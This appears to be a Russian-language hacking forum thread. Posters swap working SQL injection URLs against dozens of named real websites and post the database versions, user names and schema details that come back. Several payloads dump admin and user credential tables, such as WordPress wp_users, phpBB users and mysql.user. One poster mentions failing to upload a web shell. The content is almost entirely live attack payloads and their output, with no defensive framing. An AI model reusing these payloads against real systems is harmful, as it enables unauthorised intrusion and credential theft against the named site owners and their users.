Code: http://www.hendersonpartnersllp.ca/bios.php?id=-41+union+select+1,version(),3,4,5,6/* Database Version: 5.0.45 Database name: royliu User name: [email protected]
Code: http://www.facody.com/sat.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7/* Code: [email protected]:facodycom:5.0.27
PR: 7 http://tv.jlu.edu.cn/v2/index.php?o=showc;id=-1+union+select+1,concat_Ws(0x3a,user(),database(),version()),3,4,5-- tvwing@localhost:tv:4.0.22-standard
FC milan Code: http://www.clubmilan.net/news.php?id=-484+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7-- CBMILAN_DB:5.0.81-COMMUNITY-LOG:CBMILAN_US@LOCALHOST Matrix ебт Code: http://www.mxo.it/news.php?id=-60+union+select+concat_ws(0x3a,database(),version(),user())-- Sql12117_5:4.0.30-standard-log:[email protected]
[PR 6] Code: http://www.hellotourist.net/sajatlap.php?ID=-14227+union+select+1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76_+CA+LA+SOMARA+Arzachena+Hotel 5.0.45-Debian_1ubuntu3.4-log:janositibor:janositibor@localhost =================================== [PR 6] Code: http://www.jugglingdb.com/events/index.php?id=-7511+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18&lang=ca 5.0.27:ijdb:colin@localhost =================================== [PR 4] Code: http://dev.4spe.org/cc/detail.php?id=-294+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 5.0.51a-3ubuntu5.1-log:spe:speweb@localhost =================================== [PR 4] Code: http://www.cc-vw.org/index.php?id=974&level=-7+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- 5.0.45-log:sr0781254:[email protected] =================================== [PR 3] Code: http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 5.0.77-community:cc_blog:cc_php@localhost Code: http://cc.cc.moose.cc/maps/results.php?id=-13+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+cc_blog.wp_users =================================== [PR 0] Code: http://www.badlaav.co.cc/page.php?id=-19+union+select+1,2,concat_ws(0x3a,version(),database(),user()) 5.0.81-community:mechier_badlaav:mechier_dbuser@localhost
PR 6 Code: http://www.rha.msu[COLOR=Lime].edu[/COLOR]/news.php?id=13+union+select+1,2,3,4,5,6,7,8,version(),0/* Database Version: 5.0.44-log Database name: rha User name: rha@localhost
http://www.hey-u.tv/detail/detail.php?nr=26&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47-- x000102w@localhost:x000102w:5.0.51a-Max ################################### PR=5 скажите в чем прикол...+and+1=0 нужно что бы выдало результат мне ?? первый раз так подставляю http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,concat_WS(0x3a,user(),database(),version()),3,4,5,6,7,8,9-- [email protected]:ipanel:5.0.26-standard-log есть mysql.user http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,'p',3,4,5,6,7,8,9+from+mysql.user-- result: p , MQ= off tables: Code: BakVoucherHead,VoucherHead200008,Ledgers,VoucherMain200009,VoucherHead200004,CurrencySys,VoucherMain200005,VoucherHead199912,BankDiary,VoucherMain200001,ReceivableAge,BakVoucherMain,VoucherHead200009,Profit,VoucherMain200010,VoucherHead200005,Departments,VoucherMain200006,VoucherHead200001,Banks,VoucherMain200002,SysLog,BankBalanceAdjust,VoucherHead200010,ProfitX,VoucherHead200006,LedgerAbstract,VoucherMain200007,VoucherHead200002,CashBalanceAdjust,VoucherMain200003,Users,BankBursarAdjust,VoucherMain199911,QueryTempHead,AssetDebt,VoucherHead200007,LedgerBalance,VoucherMain200008,VoucherHead200003,CashDiary,VoucherMain200004,VoucherHead199911,BankCheck,VoucherMain199912,QueryTempMain,Groups,ImageGroups,Images,QueryTempHead,VoucherMain200002,LedgerBalance,VoucherHead200003,VoucherHead199911,QueryTempMain,VoucherMain200003,Ledgers,VoucherMain199911,VoucherHead199912,CashDiary,ReceivableAge,Profit,VoucherMain199912,Departments,VoucherHead200001,CountDetail_temp,SysLog,ProfitX,VoucherMain200001,LedgerAbstract,VoucherHead200002,CurrencySys,Users,viewFile,viewcont,linkBook,users,linkBook,users,viewFile,viewcont,contenttype,ReceivableAge,VoucherMain200008,CashDeal_back_8_29,VoucherHead200210,VoucherMain200108,VoucherHead200105,VoucherMain200106,VoucherHead200005_backup,ProfitX,VoucherMain200006,Banks,VoucherMain200209,VoucherHead200206,VoucherHead200101,VoucherMain200102,VoucherHead200003_backup,VoucherMain200004,LedgerBalance,VoucherMain200205,VoucherHead200202,BankBalanceAdjust,VoucherHead200010,VoucherMain200010_backup,VoucherHead200002,VoucherMain200002,DateTableRemark,VoucherMain200201,VoucherHead200110,BakVoucherHead,VoucherHead200008,SysLog,VoucherMain200008_backup,CashDeal_back_9_10,VoucherHead200211,VoucherMain200109,VoucherHead200106,VoucherHead200006,VoucherMain200107,QueryTempHead,VoucherMain200006_backup,CashBalanceAdjust,VoucherMain200210,VoucherHead200207,VoucherHead200102,VoucherMain200103,VoucherHead200004,VoucherMain200004_backup,LedgerBalance_backup,BankBursarAdjust,VoucherMain200206,VoucherHead200203,VoucherHead200010_backup,VoucherMain200011,VoucherHead200002_backup,VoucherMain200002_backup,Departments,Vouch некоторые повторяются #################################### PR=4 http://chamjb.eduhope.net/bbs/comment_write.php?board=chamjic-2&id=303&mode=modify&no=281+and+substring(version(),1,1)=4--
http://www.ribera.tv/videos.php?id=1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15-- ribera00_video@localhost:ribera00_video:4.1.22-standard #################################### http://yt-export.com/details.php?kind=07&kinds=07a23&id=-1'+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12%23 [email protected]:ytexportcom:5.0.41-log #################################### PR: 5 http://www.ee.ndhu.edu.tw/main.php?main=dept_course_detail&id=1&idc=134'+and+substring(version(),1,1)=5%23 #################################### Pashkela опять для тебя =)опять не смог залить шелл ((( (если зальеш кинь в личку ))))) PR: 4 http://www.catolica.edu.sv/inicio.php?name=Decanato&id=-1'+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13+from+mysql.user+--+ 5.0.26-Max:root@localhostpal
Code: http://www.snis.ch/conference.php?ID=-13+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13-- PR 0 Верия - 5.0.67-log database - swissinternationalstudiesch user [email protected]
Code: http://www.forumgallery.com/current_on1.php?id=222+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162-- forumgallery:4.1.22:forumg63@localhost Code: http://www.metallicafan.de/news.php?id=-188+union+select+1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9-- DB40286:4.0.27-log:[email protected] Code: http://europeanspeedclub.com/news.php?id=-930+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,database(),version(),user()),9,10,11,12-- ideallinie:5.0.32-Debian_7etch6-log:ideallinie@localhost Code: http://www.jestemdobry.pl/news.php?ID=-9+union+select+1,concat_ws(0x3a,database(),version(),user()),3-- jestemdobry:5.0.45:jestemdobry_db@localhost
PR 5, ТИЦ 450 PR 5 PR 3, ТИЦ 20 PR 3 PR 3 вывод в исходном коде: projimg_chastain:4.1.20:wsdr@localhost PR 3
PR 4 Code: http://www.bishopdwenger.com/content.php?id=-64+union+select+group_concat(username,0x3a,password),2+from+admin/* Database Version: 5.0.45-log Database name: bishop_dwenger User name: bd_dbsiteuser@localhost
Code: http://www.paceeducation.ca/course.php?id=-41+union+select+version(),2-- Database Version: 5.0.51a Database name: pace User name: pace@localhost -------------------------------------------------------------------- Code: http://www.initiativa.ru/index.php?id=39+union+select+1,2,unhex(hex(version())),4/* Database Version: 4.1.16-log Database name: init User name: init@localhost -------------------------------------------------------------------- Code: http://artelf.ru/items.php?id=-39+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0/* Database Version: 4.1.18 Database name: artelf User name: artelf@localhost
Code: http://www.slavsandtatars.com/about.php?id=-1+union+select+unhex(hex(concat_ws(0x3a,username,passwd))),2,3+from+admin--
http://www.liceocastilla.edu.sv/vista_galeria.php?id=1'+union+select+1,2,3,concat_Ws(0x3a,user(),database(),version()),5,6/* [email protected]:liceocastilla_edu_sv_colegio:5.0.45
обеденный пиррифф.. Version: 5.0.22-community-nt User: web@localhost Dbname: athletics file_priv=Y =)
Code: ell.kz/index.php?id=2&target=163 and ascii(substring(user(),4,1))<95 Вот что поканабрал : DHT Code: http://sotovikcity.ru/phone.php?ID=-1+union+select+1,concat_WS(0x3a,name,password),3+from+auth-- Code: http://cifravoz.ru/views3.php?id=-173+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables-- Code: http://msmobiles.com/mobile/news.php?id=-1+union+select+1,2,unhex(hex(group_concat(concat_WS(0x3a,rus_login,rus_password)))),4,5,6,7,8,9,10,11,12,13,14,15+from+msmo_registered_users-- Code: http://classifieds.bechna.com/view_sale_details.php?id=-1+union+select+pass,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+admin--&city=Delhi Code: http://www.chat.hcgomel.com/news.php?ID=-311+union+select+1,2,3,unhex(hex(concat_ws(0x3a,username,user_password,user_icq))),5,6,7,8+from+phpbb_users+limit+0,1--
HTML: http://www.pioner.su/news.php?id=-30+union+select+1,concat_ws(0x3a,version(),user(),database(),@@version_compile_os),3-- 4.1.22-log:allianc0_@localhost:allianc0_ortbld-freebsd6.1 HTML: http://www.rstd.ru/news.php?id=-30+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6-- 5.0.67-log:u145464_2:[email protected] HTML: http://www.tviphilippines.com/article.php?id=-21+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14-- 5.0.81-community-log:tviphili_tviphil@localhost:tviphili_tviphils HTML: http://www.kotogoto.com/article.php?id=21+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6-- 5.0.24a-Debian_2.dotdeb.0-log:db25283:db25283@localhost HTML: http://www.grp-s.ru/article.php?id=-21+union+select+concat_ws(0x3a,version(),user(),version(),database()),2,3,4-- 5.0.67-log:grpsgrp_grps@localhost:5.0.67-log:grpsgrp_grps HTML: http://dev.onlinedrummer.com/article.php?id=-21+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14-- 5.0.45-communityldpublic@localhost:SiteFeatures HTML: http://developpement-durable.ujjef.com/point.php?id=4+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables-- HTML: http://www.golfdirect.co.za/golf.php?id=-4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9-- 5.0.81-community:wwwgolf_golfdirect:wwwgolf_golfd@localhost
